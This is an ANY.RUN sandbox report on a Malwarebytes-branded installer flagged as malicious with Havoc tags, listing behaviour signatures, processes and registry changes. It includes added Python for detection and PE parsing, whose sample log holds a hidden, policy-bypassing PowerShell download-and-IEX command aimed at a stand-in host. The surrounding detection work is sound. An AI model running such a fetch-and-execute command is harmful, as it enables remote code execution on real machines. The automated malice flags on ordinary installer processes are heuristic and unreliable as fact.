File name: MBSetup.exe

Full analysis: https://app.any.run/tasks/ac8e55e8-ae40-4542-954a-564098efe02e
Verdict: Malicious activity
Threats:

Havoc is an open-source post-exploitation (command-and-control) framework that attackers use to keep control of a system after the initial breach. With Havoc, an operator can run commands remotely, inject code into running processes, and access sensitive data. It is often seen in targeted intrusions, where it lets the attacker stay hidden in a network while stealing information or moving to further targets. Its flexibility and evasion features make it a serious threat, especially in environments that rely on traditional signature-based security tools.

Analysis date: April 23, 2025, 23:47:42
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
connectwise
rmm-tool
stealer
possible-phishing
auto
havoc
arch-exec
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5: B6D8B7E6F74196F62CABA2CA77A7AE91
SHA1: 6AC9C99F084B5772440E2F135B8D5365F7F45314
SHA256: 74B0BF9C17091AB1C6C61AF0AEFBC599F1ECC0FFF6DEE0144A3DFD5CD1F5E18F
SSDEEP: 98304:gWn8nBJ4ZfXM5t0X1NrH22IT1PD2222222721vFdGBeQN0aFvGSSRkrlcfABLqIL:DXL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • HAVOC has been found (auto)

      • firefox.exe (PID: 968)
      • WinRAR.exe (PID: 5668)
    • Actions looks like stealing of personal data

      • MBAMService.exe (PID: 7808)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8220)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 9164)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8220)
  • SUSPICIOUS

    • Searches for installed software

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)
    • Reads the BIOS version

      • MBSetup.exe (PID: 6808)
      • MBAMService.exe (PID: 7808)
    • Creates files in the driver directory

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
    • The process verifies whether the antivirus software is installed

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
      • Malwarebytes.exe (PID: 8820)
      • MBAMWsc.exe (PID: 8652)
      • Malwarebytes.exe (PID: 8900)
      • Malwarebytes.exe (PID: 8972)
    • Executable content was dropped or overwritten

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • drvinst.exe (PID: 7484)
      • MBVpnTunnelService.exe (PID: 4276)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
    • Executes as Windows Service

      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)
    • Drops 7-zip archiver for unpacking

      • MBAMInstallerService.exe (PID: 664)
    • The process creates files with name similar to system file names

      • MBAMInstallerService.exe (PID: 664)
    • Drops a system driver (possible attempt to evade defenses)

      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
    • Process drops legitimate windows executable

      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)
    • The process drops C-runtime libraries

      • MBAMInstallerService.exe (PID: 664)
    • Adds/modifies Windows certificates

      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)
    • Changes Internet Explorer settings (feature browser emulation)

      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)
    • Creates or modifies Windows services

      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
    • Creates/Modifies COM task schedule object

      • MBAMService.exe (PID: 7808)
    • Reads security settings of Internet Explorer

      • MBAMService.exe (PID: 7808)
      • ig.exe (PID: 1240)
      • WinRAR.exe (PID: 5668)
      • Malwarebytes.exe (PID: 8820)
    • Creates a software uninstall entry

      • MBAMInstallerService.exe (PID: 664)
    • Application launched itself

      • Malwarebytes.exe (PID: 8900)
    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 5668)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 8220)
    • The process executes Powershell scripts

      • cmd.exe (PID: 9164)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 9164)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 9164)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 9164)
    • There is functionality for taking screenshot (YARA)

      • Malwarebytes.exe (PID: 8820)
  • INFO

    • Reads the computer name

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
      • ig.exe (PID: 1240)
      • MBAMWsc.exe (PID: 8652)
      • Malwarebytes.exe (PID: 8820)
      • Malwarebytes.exe (PID: 8900)
      • Malwarebytes.exe (PID: 8972)
    • The sample compiled with english language support

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7808)
      • MBAMService.exe (PID: 7728)
    • Create files in a temporary directory

      • MBSetup.exe (PID: 6808)
    • Checks supported languages

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
      • ig.exe (PID: 1240)
      • MBAMWsc.exe (PID: 8652)
      • Malwarebytes.exe (PID: 8820)
      • Malwarebytes.exe (PID: 8900)
      • Malwarebytes.exe (PID: 8972)
    • Reads the machine GUID from the registry

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7808)
    • Creates files in the program directory

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • MBAMService.exe (PID: 7808)
      • Malwarebytes.exe (PID: 8820)
    • Reads the software policy settings

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • slui.exe (PID: 864)
      • slui.exe (PID: 4068)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7808)
      • Malwarebytes.exe (PID: 8820)
    • Checks proxy server information

      • MBSetup.exe (PID: 6808)
      • slui.exe (PID: 4068)
      • powershell.exe (PID: 8220)
      • Malwarebytes.exe (PID: 8820)
    • The sample compiled with spanish language support

      • MBAMInstallerService.exe (PID: 664)
    • Manual execution by a user

      • firefox.exe (PID: 5416)
      • WinRAR.exe (PID: 5668)
      • Malwarebytes.exe (PID: 8900)
    • Application launched itself

      • firefox.exe (PID: 5416)
      • firefox.exe (PID: 968)
    • Adds/modifies Windows certificates

      • drvinst.exe (PID: 7484)
    • Reads Environment values

      • MBAMService.exe (PID: 7808)
    • CONNECTWISE has been detected

      • MBAMService.exe (PID: 7808)
    • Reads the time zone

      • MBAMService.exe (PID: 7808)
    • Reads CPU info

      • MBAMService.exe (PID: 7808)
    • Creates files or folders in the user directory

      • Malwarebytes.exe (PID: 8820)
    • Process checks computer location settings

      • Malwarebytes.exe (PID: 8820)
    • Disables trace logs

      • powershell.exe (PID: 8220)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8220)
    • Process checks whether UAC notifications are on

      • Malwarebytes.exe (PID: 8820)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
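The PowerShell-related signatures above (hidden window, execution-policy bypass, profile bypass, download via PowerShell, use of IEX, and the WinRAR.exe -> cmd.exe -> powershell.exe launch chain) are the kind of rule a detection engineer replays over endpoint process-creation telemetry. The following is an added example in Python, not ANY.RUN's own detection code. The PIDs 5668, 9164 and 8220 are the ones this report names; the command lines, the parent PID 4012, the extra benign PowerShell process 4321 and the pid/ppid/image/cmd log format are constructed, because the report does not show the real command lines.

```python
"""Replay of the report's PowerShell signatures over constructed
process-creation log lines (Sysmon Event ID 1 reduced to pid/ppid/image/cmd).
Added example, not ANY.RUN code. PIDs 5668/9164/8220 come from the report;
every command line below is an assumption."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


# Constructed sample telemetry; the command lines are not from the report.
SAMPLE_LOG = r"""
pid=5668 ppid=4012 image=C:\Program Files\WinRAR\WinRAR.exe cmd="C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Downloads\setup.rar
pid=9164 ppid=5668 image=C:\Windows\System32\cmd.exe cmd=cmd.exe /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
pid=8220 ppid=9164 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
pid=4321 ppid=4012 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -NoProfile -Command Get-Date
""".strip().splitlines()

LINE_RE = re.compile(r"^pid=(\d+) ppid=(\d+) image=(.+?) cmd=(.*)$")

# (signature name as the report phrases it, pattern over the command line).
# PowerShell accepts unambiguous prefixes (-w, -ep, -nop), so the patterns do too.
CMDLINE_RULES = [
    ("Run PowerShell with an invisible window", re.compile(r"-w\w*\s+hidden", re.I)),
    ("Changes powershell execution policy (Bypass)", re.compile(r"-e[xp]\w*\s+bypass", re.I)),
    ("The process bypasses the loading of PowerShell profile settings", re.compile(r"-nop\w*\b", re.I)),
    ("Downloads file from URI via Powershell",
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
    ("Possibly malicious use of IEX has been detected", re.compile(r"\biex\b|invoke-expression", re.I)),
]


def parse_log(lines):
    """Turn the constructed log lines into ProcessEvent records."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(ProcessEvent(int(m[1]), int(m[2]), m[3], m[4]))
    return events


def lineage(by_pid, pid):
    """Process names from pid upward through its recorded ancestors."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return names


def evaluate(events):
    """Map pid -> list of fired signature names (only pids with at least one hit)."""
    by_pid = {e.pid: e for e in events}
    hits = {e.pid: [] for e in events}
    for ev in events:
        hits[ev.pid] += [name for name, rx in CMDLINE_RULES if rx.search(ev.cmdline)]
        parent = by_pid.get(ev.ppid)
        # Parent/child rules are attributed to the launching process, as in the report.
        if parent and parent.name == "winrar.exe" and ev.name == "cmd.exe":
            hits[parent.pid].append("Starts CMD.EXE for commands execution")
        if parent and parent.name == "cmd.exe" and ev.name == "powershell.exe":
            hits[parent.pid].append("Starts POWERSHELL.EXE for commands execution")
        if ev.name == "powershell.exe" and lineage(by_pid, ev.pid)[:3] == ["powershell.exe", "cmd.exe", "winrar.exe"]:
            hits[ev.pid].append("PowerShell launched through WinRAR.exe -> cmd.exe")
    return {pid: names for pid, names in hits.items() if names}


def triage(hits, pid):
    """Crude verdict: the archive->shell->PowerShell chain or three stacked
    evasion flags is treated as malicious; a single flag is only suspicious."""
    names = hits.get(pid, [])
    if any("WinRAR.exe -> cmd.exe" in n for n in names) or len(names) >= 3:
        return "malicious"
    return "suspicious" if names else "clean"


if __name__ == "__main__":
    found = evaluate(parse_log(SAMPLE_LOG))
    for pid, names in sorted(found.items()):
        print(pid, triage(found, pid), names)
```

The single-flag case (PID 4321, -NoProfile alone) is deliberately left at "suspicious": administrators' scripts use -NoProfile routinely, and it is the combination of flags plus the launch chain, not any one of them, that separates the report's PID 8220 from ordinary use.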
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:03:19 17:48:54+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 750080
InitializedDataSize: 1796608
UninitializedDataSize: -
EntryPoint: 0x6ee6e
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 5.1.2.88
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Malwarebytes
FileDescription: Malwarebytes Setup
FileVersion: 5.1.2.88
LegalCopyright: Copyright (C) 2017 - 2024 Malwarebytes, Inc. All rights reserved.
InternalName: MBSetup.exe
OriginalFileName: MBSetup.exe
ProductName: Malwarebytes
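The EXIF block above mixes two sources: the COFF/optional headers (MachineType, TimeStamp, PEType, LinkerVersion, EntryPoint, Subsystem) and the version resource (FileVersion, CompanyName, ObjectFileType). As an added example, not ANY.RUN tooling, the following Python reads the header fields directly from the headers and checks the file's SHA-256 against the value the report lists. The sample bytes are a constructed minimal PE32 header carrying the report's values (5 sections, 2024-03-19 link time, entry point 0x6ee6e, linker 14.16, GUI subsystem), not the real MBSetup.exe, so the hash check is expected to fail on it.

```python
"""PE header triage for the fields this report lists under EXIF, plus a
SHA-256 check against the report. Added example, not ANY.RUN code.
build_sample_header() constructs a stand-in header; it is not MBSetup.exe."""
import hashlib
import struct
from datetime import datetime, timezone

REPORT_SHA256 = "74B0BF9C17091AB1C6C61AF0AEFBC599F1ECC0FFF6DEE0144A3DFD5CD1F5E18F"

MACHINES = {0x14C: "Intel 386 or later, and compatibles", 0x8664: "AMD AMD64"}
SUBSYSTEMS = {2: "Windows GUI", 3: "Windows command line"}
IMAGE_FILE_DLL = 0x2000   # COFF Characteristics bit that marks a DLL


def parse_pe_header(data: bytes) -> dict:
    """Extract machine, section count, link time, PE type, linker version,
    entry point, subsystem and DLL flag from the COFF and optional headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    if opt_size < 70:
        raise ValueError("optional header too short")
    opt = coff + 20
    magic, major_linker, minor_linker, code_size, init_size, uninit_size, entry = struct.unpack_from("<HBBIIII", data, opt)
    # From offset 32 on, PE32 and PE32+ optional headers share the same layout.
    major_os, minor_os, _, _, major_sub, minor_sub = struct.unpack_from("<HHHHHH", data, opt + 40)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y:%m:%d %H:%M:%S+00:00"),
        "pe_type": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic)),
        "linker_version": f"{major_linker}.{minor_linker}",
        "code_size": code_size,
        "initialized_data_size": init_size,
        "uninitialized_data_size": uninit_size,
        "entry_point": hex(entry),
        "os_version": f"{major_os}.{minor_os}",
        "subsystem_version": f"{major_sub}.{minor_sub}",
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def matches_report(info: dict, expected_sha256: str = REPORT_SHA256) -> bool:
    """True when the parsed file is the exact sample the report analysed."""
    return info["sha256"].lower() == expected_sha256.lower()


def build_sample_header() -> bytes:
    """Constructed minimal PE32 header mirroring the report's EXIF values.
    Not the real MBSetup.exe; it will not hash to REPORT_SHA256."""
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")   # e_lfanew = 0x80
    link_time = int(datetime(2024, 3, 19, 17, 48, 54, tzinfo=timezone.utc).timestamp())
    coff = struct.pack("<HHIIIHH", 0x14C, 5, link_time, 0, 0, 224, 0x0102)   # i386, 5 sections, EXE|32BIT
    opt = struct.pack("<HBBIIII", 0x10B, 14, 16, 750080, 1796608, 0, 0x6EE6E)
    opt += struct.pack("<IIIII", 0x1000, 0, 0x400000, 0x1000, 0x200)   # BaseOfCode, BaseOfData, ImageBase, alignments
    opt += struct.pack("<HHHHHH", 6, 0, 0, 0, 6, 0)                     # OS, image and subsystem versions
    opt += struct.pack("<IIII", 0, 0x300000, 0x400, 0)                  # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
    opt += struct.pack("<HH", 2, 0x8140)                                # Subsystem = GUI, DllCharacteristics
    return dos + b"PE\0\0" + coff + opt.ljust(224, b"\0")


if __name__ == "__main__":
    parsed = parse_pe_header(build_sample_header())
    for key, value in parsed.items():
        print(f"{key}: {value}")
    print("matches report:", matches_report(parsed))
```

Two things the parser makes visible. The report's "ObjectFileType: Dynamic link library" comes from the version resource, which the vendor fills in by hand; the COFF Characteristics bit (IMAGE_FILE_DLL) is what actually decides whether the image is a DLL, and the "File info" line and the constructed header above both say executable. Likewise TRiD's "Win64 Executable" guess is a heuristic, while the Machine value 0x14c and the PE32 magic are authoritative.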
All screenshots are available in the full report
Total processes: 175
Monitored processes: 39
Malicious processes: 12
Suspicious processes: 3

Behavior graph

Process launch order from the graph (processes tagged #HAVOC are marked): mbsetup.exe, sppextcomobj.exe, slui.exe, mbaminstallerservice.exe, slui.exe, firefox.exe, firefox.exe (#HAVOC), firefox.exe x10, mbvpntunnelservice.exe, conhost.exe, firefox.exe, drvinst.exe, firefox.exe x2, mbamservice.exe x2, rundll32.exe, ig.exe, winrar.exe (#HAVOC), help.exe x2, mbamwsc.exe, malwarebytes.exe x3, cmd.exe, conhost.exe, powershell.exe, conhost.exe, svchost.exe, mbsetup.exe

Process information

PID: 664
CMD: "C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
Path: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
Parent process: services.exe
User: SYSTEM
Company: Malwarebytes
Integrity Level: SYSTEM
Description: Malwarebytes Installer Service
Exit code: 0
Version: 5.1.0.189
Loaded modules:
c:\program files\malwarebytes\anti-malware\mbaminstallerservice.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\authz.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll

PID: 864
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Loaded modules:
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

PID: 968
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe"
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Loaded modules:
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll

PID: 1096
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5536 -childID 5 -isForBrowser -prefsHandle 4920 -prefMapHandle 5060 -prefsLen 31243 -prefMapSize 244583 -jsInitHandle 1436 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e67af47e-5544-4f83-9df5-91ccb0411543} 968 "\\.\pipe\gecko-crash-server-pipe.968" 19bcc69d310 tab
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Loaded modules:
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140.dll

PID: 1240
CMD: ig.exe secure
Path: C:\Users\admin\AppData\LocalLow\IGDump\sec\ig.exe
Parent process: MBAMService.exe
User: admin
Company: MalwareBytes
Integrity Level: LOW
Description: Malware Scanner
Exit code: 3235811341
Version: 1.0.4.8
Loaded modules:
c:\program files\malwarebytes\anti-malware\ig.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll

PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Exit code: (still running)
Version: 10.0.19041.1 (WinBuild.160101.0800)
Loaded modules:
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

PID: 2596
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4740 -parentBuildID 20240213221259 -sandboxingKind 0 -prefsHandle 4708 -prefMapHandle 4728 -prefsLen 36588 -prefMapSize 244583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17eb7c91-7b5a-4cf5-9f8a-01e6cc86a2b9} 968 "\\.\pipe\gecko-crash-server-pipe.968" 19bcac32310 utility
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 1
Version: 123.0
Loaded modules:
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
c:\windows\system32\crypt32.dll

PID: 3968
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2916 -childID 1 -isForBrowser -prefsHandle 2312 -prefMapHandle 2564 -prefsLen 31447 -prefMapSize 244583 -jsInitHandle 1436 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {25702e6c-992e-4145-bd4d-e2df55f2a7cc} 968 "\\.\pipe\gecko-crash-server-pipe.968" 19bc749cf50 tab
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Loaded modules:
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\vcruntime140_1.dll

PID: 4068
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Loaded modules:
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

PID: 4200
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2188 -parentBuildID 20240213221259 -prefsHandle 2180 -prefMapHandle 2176 -prefsLen 31031 -prefMapSize 244583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44f5f626-5bf4-4a2b-b8f5-77acd995c7f7} 968 "\\.\pipe\gecko-crash-server-pipe.968" 19bb5880710 socket
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Loaded modules:
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
Total events: 295 818
Read events: 294 852
Write events: 936
Delete events: 30

Modification events

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes
Operation: write
Name: id
Value: ced8f4bdab0e451983652875cde488c0

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Malwarebytes
Operation: write
Name: id
Value: ced8f4bdab0e451983652875cde488c0

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\mbamtestkey
Operation: delete key
Name: (default)
Value: (empty)

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Malwarebytes
Operation: delete value
Name: IrisFirstRun
Value: (empty)

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation: write
Name: UserName
Value: admin

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation: write
Name: ProductCode
Value: MBAM-C

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation: write
Name: ProductBuild
Value: consumer

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation: write
Name: ProgramDirectory
Value: C:\Program Files\Malwarebytes\Anti-Malware

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation: write
Name: LocalAppDataDir
Value: C:\Users\admin\AppData\Local

PID 6808, MBSetup.exe
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation: write
Name: Channel
Value: release
Executable files: 1 278
Suspicious files: 467
Text files: 100
Unknown types: 0

Dropped files

PID 664, MBAMInstallerService.exe
File: C:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\ctlrpkg.7z
Type: -
MD5: -
SHA256: -

PID 664, MBAMInstallerService.exe
File: C:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\dbclspkg.7z
Type: -
MD5: -
SHA256: -

PID 664, MBAMInstallerService.exe
File: C:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\dotnetpkg.7z
Type: -
MD5: -
SHA256: -

PID 6808, MBSetup.exe
File: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
Type: executable
MD5: CEA3222BD01165E983F7079C4DD88B11
SHA256: 4D3204DD695B8A7E32A4E123B79D3470088CCAA3BDDAA187C2661445CA852344

PID 6808, MBSetup.exe
